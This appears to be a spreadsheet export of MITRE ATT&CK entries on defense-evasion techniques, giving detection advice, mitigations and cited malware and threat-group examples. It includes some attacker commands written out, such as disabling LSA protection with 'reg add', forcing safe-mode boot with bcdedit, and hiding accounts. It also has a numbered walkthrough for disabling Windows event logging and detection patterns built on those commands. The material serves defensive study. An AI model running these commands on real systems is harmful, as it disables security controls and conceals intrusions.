[OSX/Shlayer](https://attack.mitre.org/software/S0402) has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) sets the main loader file’s attributes to hidden.(Citation: TrendMicro MacOS April 2018)
Okrum
Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can modify the characteristics of folders to hide them from the compromised user.(Citation: Proofpoint TA416 Europe March 2022)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has placed its payload in hidden subdirectories.(Citation: Trend Micro Black Basta October 2022)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) has the ability to set file attributes to "hidden" to hide files from the compromised user's view in Windows File Explorer.(Citation: CISA AR18-352A Quasar RAT December 2018)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has been created with a hidden attribute to insure it's not visible to the victim.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has the ability to set file attributes to hidden.(Citation: Trend Micro Iron Tiger April 2021)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) hides a copy of itself in the user's &lt;code&gt;~/Library&lt;/code&gt; directory by using a &lt;code&gt;.&lt;/code&gt; at the beginning of the file name followed by 9 random characters.(Citation: wardle evilquest parti)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; to make some of its files hidden.(Citation: LogRhythm WannaCry)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) has copied a random file from the Windows System32 folder to the &lt;code&gt;%APPDATA%&lt;/code&gt; location under a different hidden filename.(Citation: NCC Group WastedLocker June 2020)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses a hidden folder named &lt;code&gt;.xcassets&lt;/code&gt; and &lt;code&gt;.git&lt;/code&gt; to embed itself in Xcode.(Citation: trendmicro xcsset xcode project 2020)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day).(Citation: Bitdefender FunnyDream Campaign November 2020)
iKitten
[iKitten](https://attack.mitre.org/software/S0278) saves itself with a leading "." so that it's hidden from users by default.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that could be taken to add a new user and subsequently hide it from login screens.
File Modification
Monitor for changes made to files that may use hidden users to mask the presence of user accounts they create or modify. Monitor for changes made to the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file for unexpected modifications to the &lt;code&gt; Hide500Users&lt;/code&gt; key value on macOS.(Citation: Cybereason OSX Pirrit)
Process Creation
Monitor newly executed processes for actions that could be taken to add a new user and subsequently hide it from login screens.
User Account Creation
Monitor for newly constructed user accounts, such as userIDs under 500 on macOS, that may mask the presence of user accounts they create or modify.
User Account Metadata
Monitor for contextual data about an account, which may include a username, user ID, environmental data that may mask the presence of user accounts they create or modify. On macOS, identify users with an userID under 500 and the &lt;code&gt;Hide500Users&lt;/code&gt; key value in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file set to &lt;code&gt;TRUE&lt;/code&gt;.(Citation: Cybereason OSX Pirrit)
Windows Registry Key Modification
Monitor for changes made to windows registry key or values for unexpected modifications of the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; key.
Operating System Configuration
If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; &lt;code&gt;Hide500Users&lt;/code&gt; value will force all users to be visible.
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has modified the Registry to hide created user accounts.(Citation: US-CERT TA18-074A)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has run &lt;code&gt;reg add ‘HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList’ /v&lt;/code&gt; to hide a newly created user.(Citation: KISA Operation Muzabi)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has modified the Registry to hide created user accounts from the Windows logon screen. (Citation: FireEye SMOKEDHAM June 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may use hidden windows to conceal malicious activity from the plain sight of users. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style.
File Modification
Monitor for changes made to files that may use hidden windows to conceal malicious activity from the plain sight of users. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.
Process Creation
Monitor newly executed processes that may use hidden windows to conceal malicious activity from the plain sight of users.
Script Execution
Monitor for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Execution Prevention
Limit or restrict program execution using anti-virus software. On MacOS, allowlist programs that are allowed to have the plist tag. All other programs should be considered suspicious.
APT19
[APT19](https://attack.mitre.org/groups/G0073) used &lt;code&gt;-W Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used the WindowStyle parameter to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: Palo Alto Sofacy 06-2018) (Citation: McAfee APT28 DDE1 Nov 2017)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to use &lt;code&gt;-WindowStyle Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye Operation Double Tap)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used the WindowStyle parameter to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: FireEye APT32 May 2017) (Citation: Cybereason Cobalt Kitty 2017)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) has used &lt;code&gt;-w hidden&lt;/code&gt; and &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: ClearSky Wilted Tulip July 2017)
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) has used &lt;code&gt;-WindowStyle Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: Unit 42 DarkHydrus July 2018)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) has used &lt;code&gt;-w hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: Alperovitch 2014)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used &lt;code&gt;hidcon&lt;/code&gt; to run batch files in a hidden console window.(Citation: Unit 42 Gamaredon February 2022)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) has used &lt;code&gt;-W Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: Unit 42 Gorgon Group Aug 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used a payload that creates a hidden window.(Citation: PTSecurity Higaisa 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used an information gathering module that will hide an AV software window from the victim.(Citation: Talos Kimsuky Nov 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.(Citation: Unit 42 Magic Hound Feb 2017)
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) executed PowerShell in a hidden window.(Citation: ESET Nomadic Octopus 2018) 
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has used &lt;code&gt;ProcessWindowStyle.Hidden&lt;/code&gt; to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) loads its module with the XSL script parameter &lt;code&gt;vShow&lt;/code&gt; set to zero, which opens the application with a hidden window. (Citation: Cybereason Astaroth Feb 2019)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can hide the execution of scheduled tasks using `ProcessWindowStyle.Hidden`.(Citation: Telefonica Snip3 December 2021)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has hidden its console window by using the `ShowWindow` API function.(Citation: Malwarebytes AvosLocker Jul 2021)
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) uses &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload.(Citation: FireEye APT34 Dec 2017)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has executed hidden PowerShell windows.(Citation: McAfee Cuba April 2021) 
HAMMERTOSS
[HAMMERTOSS](https://attack.mitre.org/software/S0037) has used &lt;code&gt;-WindowStyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye APT29)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to hide the window for operations performed on a given file.(Citation: Carbon Black HotCroissant April 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has executed legitimate tools in hidden windows.(Citation: ESET InvisiMole June 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has used &lt;code&gt;-WindowsStyle Hidden&lt;/code&gt; to hide the command window.(Citation: MalwareBytes LazyScripter Feb 2021)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can hide the current window from the targeted user via the `ShowWindow` API function.(Citation: Kaspersky Lyceum October 2021)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) uses &lt;code&gt;-w Hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload. (Citation: PWC KeyBoys Feb 2017)
Kivars
[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) has used the command &lt;code&gt;Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden&lt;/code&gt; to hide its window.(Citation: MalwareBytes LazyScripter Feb 2021)
MCMD
[MCMD](https://attack.mitre.org/software/S0500) can modify processes to prevent them from being visible on the desktop.(Citation: Secureworks MCMD July 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can hide its console window upon execution to decrease its visibility to a victim.(Citation: Check Point Meteor Aug 2021)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)
QUIETCANARY
[QUIETCANARY](https://attack.mitre.org/software/S1076) can execute processes in a hidden window.(Citation: Mandiant Suspected Turla Campaign February 2023)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A` though [QuasarRAT](https://attack.mitre.org/software/S0262) can only be run on Windows systems.(Citation: CISA AR18-352A Quasar RAT December 2018)
QuietSieve
[QuietSieve](https://attack.mitre.org/software/S0686) has the ability to execute payloads in a hidden window.(Citation: Microsoft Actinium February 2022)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) has the ability to set its window state to hidden.(Citation: GitHub SILENTTRINITY Modules July 2019)
SharpDisco
[SharpDisco](https://attack.mitre.org/software/S1089) can hide windows using `ProcessWindowStyle.Hidden`.(Citation: MoustachedBouncer ESET August 2023)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can execute PowerShell scripts in a hidden window.(Citation: Morphisec Snip3 May 2021)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has the ability to hide the console window for its document search module from the user.(Citation: Talos Promethium June 2020)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM properties to execute malware in hidden windows.(Citation: Bromium Ursnif Mar 2017)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments associated with making configuration changes to boot settings, such as &lt;code&gt;bcdedit.exe&lt;/code&gt; and &lt;code&gt;bootcfg.exe&lt;/code&gt;.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)
Process Creation
Monitor newly executed processes that may abuse Windows safe mode to disable endpoint defenses.
Windows Registry Key Creation
Monitor Registry creation for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)
Windows Registry Key Modification
Monitor modifications to Registry data associated with enabling safe mode. For example, a service can be forced to start on safe mode boot by adding a &lt;code&gt;\*&lt;/code&gt; in front of the "Startup" value name: &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\["\*Startup"="{Path}"]&lt;/code&gt; or by adding a key to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal&lt;/code&gt;.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles, that may be abused to remotely boot a machine in safe mode.(Citation: CyberArk Labs Safe Mode 2016)
Software Configuration
Ensure that endpoint defenses run in safe mode.(Citation: CyberArk Labs Safe Mode 2016)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) can restart a compromised machine in safe mode.(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Costa AvosLocker May 2022) 
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can reboot victim machines in safe mode with networking via `bcdedit /set safeboot network`.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: Trend Micro Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: Palo Alto Networks Black Basta August 2022)
REvil
[REvil](https://attack.mitre.org/software/S0496) can force a reboot in safe mode with networking.(Citation: BleepingComputer REvil 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments, such as `nohup`, that may attempt to hide processes from interrupt signals.
Process Creation
Monitor newly created processes for artifacts, such as `nohup` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, that may attempt to hide processes from interrupt signals.
GoldMax
The [GoldMax](https://attack.mitre.org/software/S0588) Linux variant has been executed with the `nohup` command to ignore hangup signals and continue to run if the terminal session was terminated.(Citation: CrowdStrike StellarParticle January 2022)
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used the `nohup` command to instruct executed payloads to ignore hangup signals.(Citation: Shlayer jamf gatekeeper bypass 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Process Creation
Analyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.
Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use spoof arguments in spawned processes that execute beacon commands.(Citation: Cobalt Strike Manual 4.3 November 2020)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has the ability to modify its process memory to hide process command-line arguments.(Citation: FireEye FiveHands April 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that are leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections.
File Creation
Monitor for newly constructed files that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.
File Metadata
Identify files with the &lt;code&gt;com.apple.ResourceFork&lt;/code&gt; extended attribute and large data amounts stored in resource forks.
Process Creation
Monitor newly executed processes that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.
Application Developer Guidance
Configure applications to use the application bundle structure which leverages the &lt;code&gt;/Resources&lt;/code&gt; folder location.(Citation: Apple App Security Overview) 
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.(Citation: OSX Keydnap malware)
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.(Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Consider monitoring for commands and arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. &lt;code&gt;-silent&lt;/code&gt;, &lt;code&gt;-ignore-reboot&lt;/code&gt;), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. &lt;code&gt;VBoxManage startvm $VM --type headless&lt;/code&gt;).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. &lt;code&gt;VBoxManage.exe setextradata global GUI/SuppressMessages "all"&lt;/code&gt;). Monitor for commands which enable hypervisors such as Hyper-V.
File Creation
Monitor for newly constructed files associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).
Image Metadata
Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.
Process Creation
Monitor newly executed processes associated with running a virtual instance, such as those launched from binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).
Service Creation
Monitor for newly constructed services/daemons that may carry out malicious operations using a virtual instance to avoid detection. Consider monitoring for new [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software.
Windows Registry Key Modification
Monitor for changes made to Windows Registry keys and/or values that may be the result of using a virtual instance to avoid detection. For example, if virtualization software is installed by the adversary the Registry may provide detection opportunities. 
Disable or Remove Feature or Program
Disable Hyper-V if not necessary within a given environment.
Execution Prevention
Use application control to mitigate installation and use of unapproved virtualization software.
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)
Maze
[Maze](https://attack.mitre.org/software/S0449) operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so [Maze](https://attack.mitre.org/software/S0449) can encrypt files on the shared drives as well as the local machine.(Citation: Sophos Maze VM September 2020) 
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables [Ragnar Locker](https://attack.mitre.org/software/S0481) to encrypt files on the host operating system, including files on any mapped drives.(Citation: Sophos Ragnar May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)
Script Execution
Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
Disable or Remove Feature or Program
Turn off or restrict access to unneeded VB components.(Citation: Microsoft Disable VBA Jan 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Disable
Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs) In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.
Cloud Service Modification
Monitor changes made to cloud services for unexpected modifications to settings and/or data.
Command Execution
Monitor executed commands and arguments that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
Driver Load
Monitor for unusual/suspicious driver activity, especially regarding EDR and drivers associated with security tools as well as those that may be abused to disable security products.
File Deletion
Monitor for missing log files hosts and services with known active periods.
File Modification
Monitor changes made to configuration files that contain settings for logging and defensive tools.
Firewall Disable
Monitor for changes in the status of the system firewall such as Windows Security Auditing events 5025 (The Windows firewall service has been stopped) and 5034 (The Windows firewall driver was stopped).
Firewall Rule Modification
Monitor for changes made to firewall rules for unexpected modifications to allow/block specific network traffic that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
Host Status
Monitor logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. Lack of log events may be suspicious.
OS API Execution
Monitor for the abnormal execution of API functions associated with system logging.
Process Creation
Monitor newly executed processes that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
Process Modification
Using another process or third-party tools, monitor for modifications or access to system processes associated with logging.
Process Termination
Monitor for unexpected deletions of a running process (ex: Sysmon EID 5 or Windows EID 4689) that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
Script Execution
Monitor for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Service Metadata
Monitor contextual data about a service/daemon, which may include information such as name, service executable, start type that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
User Account Modification
Monitor for changes to account settings associated with users/tenants that may impact defensive logging capabilities, such as the `Update User` and `Change User License` events in the Azure AD audit log.(Citation: Mandiant Defend UNC2452 White Paper)
Windows Registry Key Deletion
Monitor for unexpected deletion of windows registry keys that that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.
Windows Registry Key Modification
Monitor Registry edits for modifications to services and startup programs that correspond to security tools.
Audit
Routinely check account role permissions to ensure only expected users and roles have permission to modify defensive tools and settings.
Execution Prevention
Use application control where appropriate, especially regarding the execution of tools outside of the organization's security policies (such as rootkit removal tools) that have been abused to impair system defenses. Ensure that only approved security applications are used and running on enterprise systems.
Restrict File and Directory Permissions
Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security/logging services.
Restrict Registry Permissions
Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security/logging services.
Software Configuration
Consider implementing policies on internal web servers, such HTTP Strict Transport Security, that enforce the use of HTTPS/network traffic encryption to prevent insecure connections.(Citation: Chromium HSTS)
User Account Management
Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security/logging services.
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has disabled LSA protection on compromised hosts using `"reg" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.(Citation: DFIR Report APT35 ProxyShell March 2022)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) reduces the integrity level of objects to allow write actions.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts provided by third-party services that may disable Windows event logging to limit data that can be leveraged for detections and audits.
Command Execution
Monitor executed commands and arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), auditpol, `sc stop EventLog`, &lt;code&gt;reg add&lt;/code&gt;, &lt;code&gt;Set- or Stop-Service&lt;/code&gt;, &lt;code&gt;Set- or New-ItemProperty&lt;/code&gt;, &lt;code&gt;sc config&lt;/code&gt;, 
and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and Invoke-Phant0m) may be used to clear logs and/or change the EventLog/audit policy.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering)(Citation: disable_win_evt_logging) 
Host Status
Monitor for logging, messaging that may disable Windows event logging to limit data that can be leveraged for detections and audits. For example, adversaries may modify the EventLog file path to a different file name and location.(Citation: disable_win_evt_logging) 
Process Creation
Monitor newly executed processes that may disable Windows event logging to limit data that can be leveraged for detections and audits.
&lt;h4&gt;Analytic 1 - Disable Windows Event Logging&lt;/h4&gt;
&lt;code&gt; susp_processes = filter processes where ((command_line CONTAINS("*New-Item*") OR command_line CONTAINS("*reg add*")) OR command_line CONTAINS("*MiniNt*")) OR (command_line CONTAINS("*Stop-Service*")AND command_line CONTAINS("*EventLog*")) OR (command_line CONTAINS("*EventLog*") AND (command_line CONTAINS("*Set-Service*") OR command_line CONTAINS("*reg add*") OR command_line CONTAINS("*Set-ItemProperty*") OR command_line CONTAINS("*New-ItemProperty*") OR command_line CONTAINS("*sc config*"))) OR (command_line CONTAINS("*auditpol*") AND (command_line CONTAINS("*/set*") OR command_line CONTAINS("*/clear*") OR command_line CONTAINS("*/revove*"))) OR ((command_line CONTAINS("*wevtutil*") AND (command_line CONTAINS("*sl*") OR command_line CONTAINS("*set-log*"))))&lt;/code&gt;
Script Execution
Monitor for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Windows Registry Key Creation
Monitor the addition of the MiniNT registry key in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control, which may disable Event Viewer.(Citation: def_ev_win_event_logging)(Citation: disable_win_evt_logging) 
Windows Registry Key Modification
Monitor the addition of the MiniNT registry key in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control, which may disable Event Viewer.(Citation: def_ev_win_event_logging)
Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. There are different ways to perform this attack.
1. The first one is to create the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt. This action will not generate Security EventLog 4657 or Sysmon EventLog 13 because the value of the key remains empty. However, if an attacker uses powershell to perform this attack (and not cmd), a Security EventLog 4663 will be generated (but 4663 generates a lot of noise).
2. The second way is to disable the service EventLog (display name Windows Event Log). After disabed, attacker must reboot the system. The action of disabling or put in manual the service will modify the Registry Key value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\start, therefore Security EventLog 4657 or Sysmon EventLog 13 will be generated on the system.
3. The third way is linked with the second. By default, the EventLog service cannot be stopped. If an attacker tries to stop the service, this one will restart immediately. Why ? Because to stop completely, this service must stop others, one in particular called netprofm (display name Network List Service). This service remains running until it is disabled. So Attacker must either disable EventLog and after to stop it or disable netprofm and after stop EventLog. Only stopping the service (even as admin) will not have an effect on the EventLog service because of the link with netprofm. Security EventLog 1100 will log the stop of the EventLog service (but also generates a lot of noise because it will generate a log everytime the system shutdown).
4. The fourth way is to use auditpol.exe to modify the audit configuration and disable/modify important parameters that will lead to disable the creation of EventLog.
5. The last one is to modify the Registry Key value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\file (or other kind of log) to modify the path where the EventLog are stocked. Importantly, with this technique, the EventViewer will use the value of the Registry Key “file” to know where to find the Log. Thus, using the EventViewer will always show the current event logs, but the old one will be stocked in another evtx. Also, the path must be in a folder that the Eventlog process has access (like it doesn’t work if attacker set up the new path in the Desktop). Attacker can also decrease the maxsize value of the Log to force the system to rewrite on the older EventLog (but the minimum cannot be less than 1028 KB). As the Registry key is modified, Security EventLog 4657 or Sysmon EventLog 13 will be generated on the system. All of these attacks required administrative right. Attacks number three, four and five do not require a system reboot to be effective immediately.
&lt;h4&gt;Analytic 1 - Disable Windows Event Logging&lt;/h4&gt;
&lt;code&gt;event_log_reg_keys = filter reg_keys where Key="*EventLog*" AND (value="Start" OR value="File" OR value="MaxSize")&lt;/code&gt;
Audit
Consider periodic review of &lt;code&gt;auditpol&lt;/code&gt; settings for Administrator accounts and perform dynamic baselining on SIEM(s) to investigate potential malicious activity. Also ensure that the EventLog service and its threads are properly running.
Restrict File and Directory Permissions
